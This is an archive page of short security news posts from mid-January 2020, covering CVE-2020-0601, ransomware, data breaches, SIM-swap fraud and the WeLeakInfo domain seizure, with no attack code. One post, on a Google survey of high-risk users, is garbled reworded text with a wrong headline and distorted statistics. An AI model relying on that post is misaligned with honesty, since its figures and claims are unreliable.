Daily Archives: January 17, 2020

Threat Roundup for January 10 to January 17

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Jan 10 and Jan 17. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More


TRU01172020 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for January 10 to January 17 appeared first on Cisco Blogs.

Friday Squid Blogging: Giant Squid Genome Analyzed

This is fantastic work:

In total, the researchers identified approximately 2.7 billion DNA base pairs, which is around 90 percent the size of the human genome. There's nothing particularly special about that size, especially considering that the axolotl genome is 10 times larger than the human genome. It's going to take some time to fully understand and appreciate the intricacies of the giant squid's genetic profile, but these preliminary results are already helping to explain some of its more remarkable features.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Hack the Army bug bounty program paid $275,000 in rewards

Hack the Army bug bounty program results: 146 valid vulnerabilities were reported by white hat hackers and more than $275,000 were paid in rewards.

The second Hack the Army bug bounty program ran between October 9 and November 15, 2019 through the HackerOne platform. The bug bounty program operated by the Defense Digital Service, along with the U.S. Department of Defense (DoD) paid more than $275,000 in rewards and a total of 146 valid vulnerabilities were reported.

52 white hat hackers took part in the Hack the Army bounty program, US army asked participants to test more than 60 publicly accessible web assets, including *.army.mil, *.goarmy.mil, and the Arlington Cemetery website.

Participants were from the U.S., Canada, Romania, Portugal, the Netherlands, and Germany.

“Participation from hackers is key in helping the Department of Defense boost its security practices beyond basic compliance checklists to get to real security,” said Alex Romero, Digital Service Expert at Department of Defense Defense Digital Service. “With each Hack the Army challenge, our team has strengthened its security posture.”

“The partnership with DDS demonstrates a fun and creative way to safely find solutions, so we look forward to building on this relationship to create future events,” said a US Army Cyber Command spokesperson.”

On November 20, during the awards ceremony held in Augusta, Georgia, the top three hackers @alyssa_herrera@erbbysam, and @cdl were rewarded for their contributions. The three experts also spoke about their experience in the program

“The Department of Defense programs are some of my favorites to hack on, and Hack the Army 2.0 was one of the most rewarding,” said second place winner @alyssa_herrera. “It is so exciting to know that the vulnerabilities I find go towards strengthening Army defenses to protect millions of people. Coming in second place and being invited to spend time with the hackers and soldiers I worked alongside made the impact we made in this Challenge feel even bigger.”

More information on the past edition of the Hack the Army program and results are available here.

Pierluigi Paganini

(SecurityAffairs – Hack the Army, hacking)

The post Hack the Army bug bounty program paid $275,000 in rewards appeared first on Security Affairs.

Windows 7 is dead, but 25% of large businesses in Canada are still running it on desktops, says IDC survey

No, it won't suddenly cease to function, as anyone who booted it up after the end-of-support deadline of January 14 discovered. It works just fine after you get past the full-screen warning from Microsoft that you're now at risk since you're running an unsupported operating system. But it's not scaring businesses from using it.

Don’t Let the Vulnera-Bullies Win. Patch Against Vulnerability CVE-2020-0601 with our Free Tool!

So much for a quiet January! By now you must have heard about the new Microsoft® vulnerability CVE-2020-0601, first disclosed by the NSA (making it the first Windows bug publicly attributed to the National Security Agency). This vulnerability is found in a cryptographic component that has a range of functions—an important one being the ability to digitally sign software, which certifies that the software has not been tampered with. Using this vulnerability, attackers can sign malicious executables to make them look legitimate, leading to potentially disastrous man-in-the-middle attacks.


Here’s the good news. Microsoft has already released a patch to protect against any exploits stemming from this vulnerability. But here’s the catch: You have to patch!

While Trend Micro offers industry-leading virtual patching capabilities via our endpoint, cloud, and network security solutions, the best protection against vulnerabilities is to deploy a real patch from the software vendor. Let me say it again for effect – the best protection against this very serious vulnerability is to ensure the affected systems are patched with Microsoft’s latest security update.

We understand how difficult it can be to patch systems in a timely manner, so we created a valuable tool that will test your endpoints to see if whether they have been patched against this latest threat or if they are still vulnerable. Additionally, to ensure you are protected against any potential threats, we have just released additional layers of protection in the form of IPS rules for Trend Micro Cloud One™ (formerly Trend Micro™ Deep Security™) and Trend Micro™ Vulnerability Protection™ (including Trend Micro Apex One™). This was rolled out to help organizations strengthen their overall security posture and provide some protection during lengthy patching processes.


You can download our Trend Micro Vulnerability Assessment Tool right now to see if you are protected against the latest Microsoft vulnerability. And while you’re at it, check out our latest Knowledge Based Article for additional information on this new vulnerability along with Trend Micro security capabilities that help protect customers like you 24/7. Even during those quite days in January.

The post Don’t Let the Vulnera-Bullies Win. Patch Against Vulnerability CVE-2020-0601 with our Free Tool! appeared first on .

Fidelis Cybersecurity Acquired by Skyview Capital

Fidelis Cybersecurity Acquired by Skyview Capital

An American company dedicated to thwarting cyber-attacks has been snapped up by a global private equity firm. 

Skyview Capital, LLC announced its acquisition of Fidelis Cybersecurity, Inc yesterday. Fidelis is located in the Maryland town of Bethesda, which a 2015 NerdWallet survey found to be the most educated place in America. 

Fidelis Cybersecurity is a leading provider of network traffic analysis and of digital forensics and incident response solutions that enable enterprises and government organizations to detect, hunt, and respond to advanced threats that evade traditional security solutions.

The company counts among its 250 employees some of the world's leading cybersecurity experts, including specialists from the US Department of Defense, the intelligence community, and industry.

Solutions developed by Fidelis are delivered as standalone network, endpoint, and deception products; an integrated platform; or as a constantly operational managed detection and response service that augments existing security operations, threat hunting, and incident response capabilities.

Fidelis was acquired from a consortium of investors in a stock transaction in a deal that serves to increase Skyview's existing software technology portfolio.

"With the ever-increasing complexity of digital environments and the pace of cyber threats across the world, we see an opportunity to build upon Fidelis' impressive technology and solidify its position within the IT security industry," said Alex Soltani, chairman and CEO of Skyview. 

"This transaction aligns well with our investment philosophy of targeting and investing in mission critical technology businesses across a wide spectrum of verticals, from telecommunications to cybersecurity."

The mission of Fidelis is not set to change as a result of the acquisition. 

Soltani said: "Skyview is committed to realizing the full value of Fidelis as a safeguard against cyber threats, and we are enthusiastic about identifying both organic and inorganic growth opportunities."

Nick Lantuh, president and chief executive officer of Fidelis Cybersecurity, sees the deal as a golden opportunity for growth. 

He said: "We are excited to partner with Skyview Capital and benefit from their ability to help us take the Fidelis platform, which provides unmatched visibility and empowers security teams to rapidly respond to threats, into other markets."

NortonLifeLock Puts Silicon Valley Real Estate Up for Sale

NortonLifeLock Puts Silicon Valley Real Estate Up for Sale

NortonLifeLock, formerly known as Symantec, has put ten large commercial buildings in California’s Silicon Valley on the market. 

The cybersecurity company is seeking a buyer for the properties, which are all based in the Mountain View area, close to the Google Quad Campus. The ten buildings on the market are grouped into three separate campuses, not more than a few minutes' drive from one another. 

Commercial real estate firm Cushman & Wakefield has been hired to help shift the properties, which together total 707,000 square feet. 

According to The Orange County Register, the buildings are featured in a brochure being circulated on behalf of NortonLifeLock. 

"Never before offered to the marketplace, the offering represents a generational opportunity to acquire a portfolio of 10 buildings totaling 706,737 square feet in the heart of Silicon Valley," states the brochure. 

Mountain View was the site of Symantec’s headquarters for many years, but in November the company, under its new name NortonLifeLock, relocated its operational nerve center to Tempe, Arizona. 

One of the three campuses for sale, described in the brochure as the "headquarters campus," is located at 350 Ellis Street. On this site are five buildings offering a total 428,000 square feet of office space. 

The second campus, which is made up of research and office buildings totaling 128,000 square feet, is located at 455, 487, and 501 E. Middlefield Road. The final clutch of office and research buildings, which together offer 150,000 square feet of space, is at 515 and 545 N. Whisman Road.

In an effort to keep the ten properties together, NortonLifeLock is ideally seeking a single buyer for all three campuses.

The brochure states that "it is a strong preference of the seller for one buyer to acquire the entire portfolio," however, "individual offers on the various components may be considered."

NortonLifeLock's decision to put the properties on the market comes amid a concerted effort by the company to downsize. Over the course of 2019, the company announced it would be terminating 320 jobs in Mountain View and a further 82 in San Francisco.

Teen Charged Over $50m SIM-Swapping Scam on Blockchain Experts

Teen Charged Over $50m SIM-Swapping Scam on Blockchain Experts

A teenager from Montreal is facing four criminal charges in connection with a $50m SIM-swapping scam that targeted two renowned Canadian Blockchain experts. 

Eighteen-year-old hacker Samy Bensaci is accused of being part of a crime ring that stole millions of dollars in crypto-currency by gaining unauthorized access to the cell phones of crypto-currency holders in America and Canada. 

Spokesperson for the Canadian police force, the Sûreté du Québec, Lieutenant Hugo Fournier, said the elaborate SIM-swapping cyber-fraud was responsible for the theft of "$50 million from our neighbors to the south and $300,000 in Canada."

Police say the crypto-currency thefts, which netted dozens of victims, were perpetrated by the gang in the spring of 2018. 

Among the alleged victims are renowned Toronto businessman, author, and head of the Blockchain Research Institute Don Tapscott and his son Alex, a globally recognized investor, advisor, and speaker on Blockchain technology and crypto-currencies. Together, father and son co-authored Blockchain Revolution: How the Technology Behind Bitcoin Is Changing Money, Business, and the World.

Bensaci was arrested in Victoria, British Colombia, in November and charged with fraudulently obtaining computer service, committing fraud over $5,000, identity fraud, and illegally accessing computer data. In December, the teen was released on $200,000 bail and ordered to live with his parents in northeast Montreal until his next court hearing.

According to La Presse, neighbors described Bensaci as a discreet young man who spends a lot of time on his computer.

While staying at his parents' residence, Bensaci is prohibited from accessing "any computer, tablet, mobile phone, game console, including PS3, PS4, Xbox, Nintendo Switch, or any other device capable of accessing the Internet," and banned from possessing or exchanging any form of crypto-currency. 

Many of the individuals allegedly targeted by the gang had attended the Consensus crypto-currency fair, held annually in New York.

"We suspect that hackers spot targets during such events," said American SIM-swapping victim Rob Ross. Ross, who was robbed of $1m in crypto-currency in two separate attacks by 21-year-old hacker Nicholas Truglia, now manages the StopSIMCrime.org website.

Ontario Provincial Police sent out an alert regarding the SIM-swap scam in November, along with a warning that fraudsters sometimes impersonate a target and falsely claim that their phone has been lost or stolen.

Winnipeg-based online pharmacy warns of data breach

A Winnipeg-based online pharmacy is still offline after telling customers their information including medications and medical history may have been compromised in a security incident.

As of Friday morning PlanetDrugsDirect.com hasn’t been reachable for over 36 hours, shortly after Bleeping Computer broke the news that an unknown number of people were being notified. The company says it has 400,000 customers.

The site’s home page displays an error message as well as the statement, “This website is using a security service to protect itself from online attacks.”

Earlier in the week, the site offered a 1-888 number for customers to call for information. This morning when the number was dialled from Toronto a recorded message said it was not available from that calling area.

The notice to customers says what may have been exposed is the person’s “name, mailing address, e-mail address, telephone number(s), occupation, employment status, referral source, the name of your primary physician (and his or her contact information), age, height, weight, sex, date of birth, the existence and types of drug allergies, medications requested, family medical history information, your personal medical history information, details of your existing medications, credit card information (including card type and number, expiry date and name of cardholder) and prescription information.”

Customers are being asked to monitor their bank and credit card accounts for suspicious activity.

The company says people can “buy cheap prescription medications safely online by a Canadian prescription referral service and have your order filled by a licensed international pharmacy.”

Created in 2001, PlanetDrugsDirect.com is one of a wide number of websites offering medicinal drugs around the world, particularly to the U.S., because prices are lower here.

In a 2014 press release the site called itself “a trusted online pharmacy offering service from Canada that provides 100 per cent safe prescription and non-prescription drugs at affordable prices with maximum protection and privacy of its customers. Hundreds of compliments are received every month from the existing happy customers along with increasing likes and shares on social media sites such as Facebook, Google+ and Twitter.”

The company also regularly mentions that it is a member of the Canadian International Pharmacy Association (CIPA), an industry association of licenced pharmacies.

“The most worrisome part of this breach is that hackers had access to patient contact information, medications taken, and payment information,” said Robert Capps, vice-president of market innovation for Vancouver-based NuData Security, a Mastercard company. “All this data could provide cybercriminals with enough information to craft fake email messages reminding them of a refill, for example, to trick victims into ordering prescription refills from untrusted sources – of fake ones.  Consumers should be wary of any emails that appear to come from a pharmacy and should avoid clicking links in such emails. We advise that consumers access their prescription drug reordering via the official website of their provider.

“Healthcare information has become increasingly valuable to cybercriminals, and there is a real risk that this and other stolen data could be used by an attacker to access a consumer’s healthcare organization. Healthcare organizations need to mitigate the damages of such breaches by verifying users by their online behaviour instead of the credentials that have been stolen by cybercriminals.”


Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity

Chinese authorities continue operations against unauthorized VPN services that are very popular in the country.

China continues to intensify the monitoring of the cyberspace applying and persecution of VPN services that could be used to bypass its censorship system known as the Great Firewall.

The Great Firewall project already blocked access to more hundreds of the world’s 1,000 top websites, including Google, Facebook, Twitter, and Dropbox.

Since early 2019, the Chinese authorities have started banning “unauthorized” VPN services, any company offering such type of service in the country must obtain an appropriate license from the government.

In December, the Chinese authorities have sentenced a man to five-and-a-half years in prison for selling a VPN service without the authorization.

According to an announcement from China’s Procuratorate Daily the man was also fined 500,000 yuan ($76,000). Prosecutors said the man was convicted of collecting “illegal revenue” of 792,638 yuan ($120,500) from his unauthorized activity.

Now media reports a new arrest made by Chinese authorities in the city of Taizhou, the police arrested a man with the pseudonym of Gao (29) that successfully operated VPN service since mid-2016. Gao has made more than 11 million Chinese yuan ($1.6 million) from renting access to VPN servers to more than 28,000 regular customers, he pleaded guilty in 2019 and is still awaiting the final sentence.

In December 2017, Chinese authorities sentenced a man from Dongguan to nine months in prison for operating a VPN service that allowed him to earn $2,000. Other criminal cases were reported by Chinese authorities in the following months, blocked services had thousands of customers in the country.

In July 2019, in compliance with the Chinese Internet monitoring law, Apple has started removing all IOS VPN apps from it App Store in China.

Pierluigi Paganini

(SecurityAffairs – Chinese authorities, privacy)

The post Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity appeared first on Security Affairs.

Utilizing real-time incentives to power change

By Kashmera Self As we enter a new decade, many people will be thinking about how they can improve their health, strengthen their communities or support the environment. Here at Interac Corp., we’re asking the same questions, albeit in slightly different ways. As Canada’s leading payments network, we have a 35-year history of providing Canadians…

Say hello to Microsoft’s new Chromium-based browser

Microsoft officially launched its new Edge Chromium browser across both Windows and macOS operating systems this week and is available for download now.

One of the biggest issues facing IT professionals is high costs and the complexity in managing enterprise companies that support two or more browsers for maximizing compatibility across legacy and modern websites. Microsoft is hoping to eliminate some of those frustrations by allowing enterprise users to access features like Internet Explorer mode, which lets businesses load legacy IE sites within Edge automatically. 

The new Edge browser also comes with Microsoft’s privacy promise and embraces new features such as tracking prevention in addition to offering three levels of control while employees are browsing. The tracking prevention feature will help businesses know who has access to their data and also give them the control to choose the information they share. Tracking prevention and SmartScreen features of the new Edge browser will also protect businesses from any type of malware, phishing scheme and malicious software. 

A study conducted by Ponemon Institute in 2019 says a data breach costs companies $3.2 million on average.

In addition, new features like Collections will let employees more easily collect and organize web content and research, and export that information into Word or Excel. 

Jimmy Tom, research director at Info-Tech, noted in a recent presentation shared with IT World that the Chromium-based browser opens up new opportunities for Microsoft.

“In effect, Microsoft can now compete in other races that it has never before considered,” he wrote, adding it could provide them with an advantage against AWS as the cloud race between the two tech giants intensifies.

Additional benefits for users giving the new browser a try, he added, include having a much more unified experience for end-users on a platform that IT can control, as well as having the ability to easily port existing Chrome apps into Edge.

The new Collections feature to allow employees more easily collect and organize web content and research.

Microsoft Search in Bing can be easily accessed on mobile phones, thereby enabling knowledge workers to search for corporate information on the go.  

Microsoft Search in Bing can be accessed on mobile phones.

Microsoft Search in Bing also offers new inPrivate mode so that online browsing and searches by employees are not attributed to them.

The new Microsoft Edge browser offers new inPrivate mode.

The new Microsoft Edge browser also comes with a new logo. 

The new Microsoft Edge browser has a new logo

In order to pilot the new Edge browser within the corporate environment, IT administrators will need to download an offline deployment package. The new Edge browser will not automatically deploy for enterprise or commercial customers, Microsoft says. Tools like Configuration Manager tools and Intune deployment, the company adds, can simplify deployment.

The new browser is supported by FastTrack and App Assure. FastTrack will allow businesses with an eligible subscription to Azure, Dynamics 365, and Microsoft 365 to deploy this new browser at no extra charge. Businesses having sites compatible with legacy Microsoft Edge, Google Chrome, or Internet Explorer 8 and above, will also work on the new Microsoft Edge the same way.

The new Microsoft Edge is available in more than 90 languages, ready to be downloaded on all supported versions of Windows and MacOS. It is also available to download on android and iOS. 



Domain Name of WeLeakInfo.com Seized by FBI and DOJ

The Federal Bureau of Investigations (FBI) and the Department of Justice (DOJ) announced that they have seized the domain name for weleakinfo.com. On January 16, the U.S. Attorney’s Office for the District of Columbia announced that the FBI and DOJ had executed a warrant to seize the domain of weleakinfo.com in cooperation with law enforcement […]… Read More

The post Domain Name of WeLeakInfo.com Seized by FBI and DOJ appeared first on The State of Security.

Podcast: Passwords: You Are the Weakest Link

Why are companies still recommending an 8-character password minimum?  Passwords are some of the easiest targets for attackers, yet companies still allow weak passwords in their environment. Multiple service providers recommend 8-character minimum passwords based on outdated data.  Download Slides: https://www.activecountermeasures.com/presentations Originally recorded as a live webcast on December 5th, 2019 Presented by: Darin Roberts & […]

The post Podcast: Passwords: You Are the Weakest Link appeared first on Black Hills Information Security.

This Week in Security News: The First Patch Tuesday Update of 2020 and Pwn2Own Vancouver Announced

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a major crypto-spoofing bug impacting Windows 10 that has been fixed as part of Microsoft’s January Patch Tuesday update. Also, read about the launch of Pwn2Own Vancouver, where it will pay to hack a Tesla Model 3.

Read on:

Can You Hack a Tesla Model 3? $500,000 Says That You Can’t

Trend Micro’s Zero Day Initiative (ZDI) has officially announced that its Pwn2Own Vancouver competition will be hosted at CanSecWest March 18-20. This time, the stakes have been upped in the automotive category: the hacker who can evade the multiple layers of security found in a Tesla Model 3 to pull off a complete vehicle compromise will win a $500,000 prize and a new Tesla Model 3.

Texas School District Loses $2.3 Million to Phishing Scam, BEC

Manor Independent School District (MISD) in Texas is investigating an email phishing attack after a series of seemingly normal school-vendor transactions resulted in the loss of an estimated $2.3 million. According to the statement posted on Twitter, the district is cooperating with the Manor Police Department and the Federal Bureau of Investigation (FBI).

Equifax Settles Class-Action Breach Lawsuit for $380.5M

A Georgia court granted final approval for an Equifax settlement in a class-action lawsuit, after the credit-reporting agency was hit by its massive 2017 data breach. This week, the Atlanta federal judge reportedly ruled that Equifax will pay $380.5 million to settle lawsuits regarding the breach.

Sodinokibi Ransomware Increases Year-End Activity, Targets Airport and Other Businesses

The Sodinokibi ransomware, detected as Ransom.Win32.SODINOKIBI,was involved in several high-profile attacks in 2019. The ransomware ended the year by launching a new round of attacks aimed at multiple organizations, including the Albany International Airport and the foreign exchange company Travelex.

ICS Security in the Spotlight Due to Tensions with Iran

Given the heightened tensions between the U.S. and Iran, organizations with connected industrial infrastructure should be on guard. In the wake of the assassination, several cybersecurity experts and U.S. government officials have warned of the ICS security risk that Iran-affiliated adversaries pose. Others point to the likelihood of smaller cyberattacks designed to distract rather than prompt retaliation.

Dymalloy, Electrum, and Xenotime Hacking Groups Set Their Targets on US Energy Sector

At least three hacking groups have been identified aiming to interfere with power grids across the United States. The oil, gas, water and energy industries have proved to become a valuable target for threat actors looking to compromise ICS environments, and according to a report on the state of industrial control systems (ICSs), attempts in attacking the utilities industry are on the rise.

Microsoft Patches Major Crypto Spoofing Bug

A major crypto-spoofing bug impacting Windows 10 users has been fixed as part of Microsoft’s January Patch Tuesday security bulletin. The vulnerability could allow an attacker to spoof a code-signing certificate, vital to validating executable programs in Windows, and make it appear as if an application was from a trusted source.

Mobile Banking Trojan FakeToken Resurfaces, Sends Offensive Messages Overseas from Victims’ Accounts

Researchers recently discovered an updated version of the mobile banking trojan FakeToken after detecting 5,000 smartphones sending offensive text messages overseas. Once the malware infects an unprotected Android device, FakeToken is able to send and intercept text messages such as 2FA codes or tokens, as well as scan through the victim’s contacts to possibly send phishing messages.

Report: Chinese Hacking Group APT40 Hides Behind Network of Front Companies

An online group of cybersecurity analysts calling themselves “Intrusion Truth” doxed their fourth Chinese state-sponsored hacking operation. After previously exposing details about Beijing’s hand in APT3 (believed to operate out of the Guangdong province), APT10 (Tianjin province), and APT17 (Jinan province), Intrusion Truth has now begun publishing details about China’s cyber apparatus in the state of Hainan, an island in the South China Sea.

What are your thoughts on the major crypto-spoofing bug that was found by the NSA? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: The First Patch Tuesday Update of 2020 and Pwn2Own Vancouver Announced appeared first on .

Cyber News Rundown: Ryuk Uses Wake-on-Lan

Reading Time: ~ 2 min.

Ryuk Adds New Features to Increase Devastation

The latest variant of the devastating Ryuk ransomware has been spotted with a new feature that allows it to turn on devices connected to the infected network. By taking advantage of Wake-on-Lan functionality, Ryuk can is able to mount additional remote devices to further its encryption protocols. While it’s possible to only allow such commands from an administrator’s machine, those are also the most likely to be compromised since they have the largest access base.

Learn more about ransomware infections and how to protect your data from cybercrime.

Bank Hackers Arrested Outside London

Over the course of six years, two individuals were able to successfully hack into many hundreds of bank and phone accounts with the intent to commit fraud. With the information they gathered, the two were also able to open new credit accounts and take out significant loans to purchase extra tech hardware. Officials for the London Metropolitan Police have made it known that cybercrime is taken just as seriously as any other crime.

Cryptominer Found After Multiple BSODs

Following a series of “blue screens of death” (BSoDs) on a medical company’s network, researchers identified a cryptominer that spread to more than 800 machines in just a couple months. The payload, a Monero miner, was hidden within a WAV file that was able to migrate undetected to various systems before executing the payload itself. To spread efficiently, the infection used the long-patched EternalBlue exploit that had not yet been updated on the network in question, thus leaving them fully susceptible to attack.

Consulting Firm Exposes Professional Data

Thousands of business professionals from the UK have potentially fallen victim to a data leak by the major consulting firm CHS. A server belonging to the company was found to contain passports, tax info, and other sensitive information that could have been archived from background checks within an unsecured Amazon Web Services bucket. While it is still unclear how long the data was available, researchers who discovered the leak quickly contacted both CERT-UK and Amazon directly, which promptly secured the server.

Western Australian Bank Breached

Over the last week officials for P&N Bank in Australia have been contacting their customers concerning a data breach that occurred during a server upgrade in early December. Though personally identifiable information has been exposed, it doesn’t appear that any accounts have been illicitly accessed and relates more to a customer’s contact information. A total number of affected customers has yet to be confirmed.

The post Cyber News Rundown: Ryuk Uses Wake-on-Lan appeared first on Webroot Blog.

Microsoft Application Inspector: Check open source components for unwanted features

Want to know what’s in an open source software component before you use it? Microsoft Application Inspector will tell you what it does and spots potentially unwanted features – or backdoors. About Microsoft Application Inspector “At Microsoft, our software engineers use open source software to provide our customers high-quality software and services. Recognizing the inherent risks in trusting open source software, we created a source code analyzer called Microsoft Application Inspector to identify ‘interesting’ features … More

The post Microsoft Application Inspector: Check open source components for unwanted features appeared first on Help Net Security.

Oracle Issues Record CPU with 334 Patches

Oracle Issues Record CPU with 334 Patches

Oracle has hit an all-time record for number of security fixes issued in a critical patch update (CPU), providing sysadmins with over 330 in its first quarterly release of the decade.

The enterprise software giant issued 334 patches in total across more than 90 products this week. As such, January 2020 easily beats the previous largest CPU, consisting of 308 fixes in July 2017.

Oracle strongly urged firms to apply the patches as soon as possible, claiming that attacks have had success in compromising customers that failed to update their systems promptly. However, there are short-term alternatives.

“Until you apply the Critical Patch Update patches, it may be possible to reduce the risk of successful attack by blocking network protocols required by an attack. For attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from users that do not need the privileges may help reduce the risk of successful attack,” it explained.

“Both approaches may break application functionality, so Oracle strongly recommends that customers test changes on non-production systems. Neither approach should be considered a long-term solution as neither corrects the underlying problem.”

Among the products affected by this quarter’s CPU are popular platforms including: Oracle Database Server, which featured 12 new patches including three remotely exploitable; Oracle Communications Applications (25 patches, 23 of which are remotely exploitable); Oracle E-Business Suite (23, 21); Oracle Enterprise Manager (50, 10); Fusion Middleware (38, 30); Java SE (12); JD Edwards (9); MySQL (19, 6); Siebel CRM (5); Oracle Virtualization (22, 3); and PeopleSoft (15, 12).

It’s a busy time of the year for IT administrators. Earlier this week, Microsoft released fixes for scores of vulnerabilities in the last regular Patch Tuesday for Windows 7 and Server 2008.

These included a serious bug disclosed by the NSA which could allow attackers to circumvent existing security by ‘signing’ malware with a legitimate-looking certificate.

Most high-risk apps have poor safety practices: Google Survey

High-risk consumers are conscious that criminals are more likely than the mainstream, but many of them still have poor security behaviors, a Google survey shows.

High-risk user groups involve executives, lawmakers and their staff, campaigners, bloggers and media influencers. Those in these groups are more likely to be targeted in cyber attacks because of their jobs or online activities.

The Harris Poll was conducted by Google to evaluate 500 U.S. high-risk users; 100 in each of the five groups listed above.

The results show that 78% of high risk consumers are conscious that hackers are more likely than the public, and 65% of them are more worried about the intrusion of accounts now than they were a year earlier— primarily because their work account is threatened.

Nearly three-quarters of respondents were phished and 39% confirmed they had abused their profiles. Phishing attempts in many cases depended on personal information, such as their name or organisation, to increase the chances of success.

While about three-quarters of high-risk users think their work and personal accounts are secured, 91 per cent of whom state they have taken steps to secure their accounts, the survey shows that many have poor security trends.

More than one third of respondents agreed not to authenticate two things, and 71% used the same passwords for at least some accounts. Just half of them use a two-faktor authentication protection token, and 76 percent allow work-related correspondence via their personal email accounts, which is generally considered risky behavior.

The survey shows that high-risk users are more likely to take measures to protect their accounts because of an intrusion on a relative than because of an attack on them. Nevertheless, 60 percent of lawmakers confirmed that they made no significant changes in how to protect their finances after the 2016 assault on the Democratic National Committee, and more than half of businesses did not adjust after the Equifax breach in 2017.

Many lawmakers are worried that their job accounts are being compromised and their image as the main concern is being harmed. Nearly 2/3 of politicians think that they will not be phished, and 81% think that their work accounts are safe. Nearly half of them have a security advisor to support them protect their online accounts.

Journalists are most unconcerned with their identities being compromised and most likely believe that they will not be phished. On the other hand, the most respondents in this category of high-risk users admitted that they were phishing attacks and all high-risk user groups are least aware of best practices in securing accounts.

As for business managers, a large majority were worried with threats on their personal and job records and their personal information is the aspect that they worry the most is hacked. We are also predictably worried that an effective hack might affect their company financially adversely. Nearly three quarters of the managers who participated in the study said they were threatened and one-third had their accounts compromised.

Google published the survey results just as it announced that its Advanced Protection program enrollment process has been simplified, adding an extra layer of safety to the accounts of high-risk users using safety keys.

The post Most high-risk apps have poor safety practices: Google Survey appeared first on .

Facial recognition is real-life ‘Black Mirror’ stuff, Ocasio-Cortez says

"People think they're going to put on a cute filter and have puppy dog ears, and not realize that that data's being collected."

Equifax Breach Settlement Could Cost Firm Billions

Equifax Breach Settlement Could Cost Firm Billions

Equifax could end up paying as much as $9.5bn following a data breach settlement branded one of the largest in history by its presiding judge.

The credit reporting giant suffered a major cyber-attack in 2017 after hackers exploited an unpatched Apache Struts vulnerability, compromising highly sensitive personal and financial information on around 148 million customers.

Over two-fifths (44%) of the population of the US are thought to have been affected.

This week, a court in Georgia finally approved a settlement in the long-running class action case that followed the breach, which will require Equifax to pay $380.5m, plus potentially an extra $125m, to satisfy claims of out-of-pocket losses.

However, that’s just a small part of the overall financial impact of the ruling.

The firm has agreed to spend at least $1bn on improving its cybersecurity posture over the coming five years. It will also need to fund several years of credit monitoring from Experian and its own services for class members. That could amount to an extra $2bn if all 140 miilion+ customers sign up.

That’s not to mention the $6bn in credit monitoring services already being claimed by several million class members, their $77.5m in attorney fees and further amounts in litigation expenses that Equifax will need to pay.

The total could creep up towards $10bn — a cautionary tale for organizations tempted to focus on business growth at the expense of cybersecurity and risk mitigation.

“This settlement is the largest and most comprehensive recovery in a data breach case in US history by several orders of magnitude,” wrote district judge Thomas Thrash.

“The minimum cost to Equifax of the settlement is $1.38bn and could be more, depending on the cost of complying with the injunctive relief, the number and amount of valid claims filed for out-of-pocket losses and the number of class members who sign up for credit monitoring.”

Law enforcement seized WeLeakInfo.com for selling access to data from data breaches

The FBI has seized the WeLeakInfo.com websites for selling subscriptions to data that were exposed in data breaches.

WeLeakInfo.com is a data breach notification service that allows its customers to verify if their credentials been compromised in data breaches. The service was claiming a database of over 12 billion records from over 10,000 data breaches. I used the past because a joint operation conducted by the FBI in coordination with the UK NCA, the Netherlands National Police Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland resulted in the seizure of the WeLeakInfo.com domain.

The WeLeakInfo website was sized and now displays a message that informs visitors about the operation conducted by law enforcement agencies.

“The website had claimed to provide its users a search engine to review and obtain the personal information illegally obtained in over 10,000 data breaches containing over 12 billion indexed records – including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts.  The website sold subscriptions so that any user could access the results of these data breaches, with subscriptions providing unlimited searches and access during the subscription period (one day, one week, one month, or three months).” reads the press release published by the Department of Justice.”With execution of the warrant, the seized domain name – weleakinfo.com – is now in the custody of the federal government, effectively suspending the website’s operation.  Visitors to the site will now find a seizure banner that notifies them that the domain name has been seized by federal authorities.  The U.S. District Court for the District of Columbia issued the seizure warrant.”

Law enforcement is still investigating the activities of the operators behind the service and encourage people to provide that information by filing a complaint with the FBI’s Internet Crime Complaint Center (IC3) at https://www.ic3.gov/complaint/default.aspx

Data breach notification services is a profitable business, visitors pay a fee to access data exposed in past data breaches. A subscription fee ranges from a $2 trial to a $70 three-month unlimited access account and allows users to search for any data in the archive managed by the companies.

This is quite different from services that only alert individuals when their data are exposed in a data breach and that for this reason are considered legal.

Data breach notification services like WeLeakInfo are a mine for threat actors that could gather information on their targets before launching a cyber attack.

Pierluigi Paganini

(SecurityAffairs – WeLeakInfo, data breach)

The post Law enforcement seized WeLeakInfo.com for selling access to data from data breaches appeared first on Security Affairs.

Data Breach Site WeLeakInfo Suspended as Feds Swoop

Data Breach Site WeLeakInfo Suspended as Feds Swoop

The FBI has joined forces with the UK’s National Crime Agency (NCA) and other law enforcers to suspend a popular website which sells access to stolen data.

The WeLeakInfo[.]com domain was seized by the Feds after the District Court for the District of Columbia issued a warrant, although its administrators are still at large.

Although the site claimed to be focused on helping breached internet users discover if their personal data had been compromised, by selling access to billions of records it also provided a useful resource for cyber-criminals looking to launch credential stuffing, phishing and other attacks.

“The website had claimed to provide its users a search engine to review and obtain the personal information illegally obtained in over 10,000 data breaches containing over 12 billion indexed records – including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts,” a statement from the Department of Justice explained

“The website sold subscriptions so that any user could access the results of these data breaches, with subscriptions providing unlimited searches and access during the subscription period (one day, one week, one month, or three months).”

The way it operated stood in contrast to legitimate breach notification site HaveIBeenPwned, which only lets users know if their accounts have been compromised, rather than providing access to troves of breached data.

